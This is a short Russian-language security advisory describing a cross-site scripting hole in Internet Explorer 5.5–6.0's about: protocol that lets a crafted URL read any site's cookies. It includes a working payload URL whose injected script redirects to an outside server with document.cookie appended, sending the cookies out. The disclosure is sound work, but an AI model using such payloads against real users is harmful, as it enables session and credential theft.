Internet Explorer содержит уязвимость, которая
позволяет нападающему построить URL, который
отобразит или изменит информацию cookies,
связанную с произвольным web узлом. Если URL
составлен в about:protocol, то Javascript, внедренный в
URL, может обращаться к любому cookies, связанным
с web узлом через 'document.cookie'. Выполнение Javascript
возможно из-за уязвимости cross-site scripting в about:
protocol.
Этот URL покажет содержание cookies, выпущенных 'www.xakep.ru":
about://www.xakep.ru/<script%20language=javascript> document.location=
'http://www.solutions.fi/~jouko/cookies2.cgi?' +document.cookie;</script>
Другие примеры можно просмотреть здесь:
http://www.solutions.fi/index.cgi/extra_iebug?lang=eng
Уязвимая система: Internet Explorer 5.5-6.0.
Более подробно об уязвимостях данного типа
можно узнать здесь:
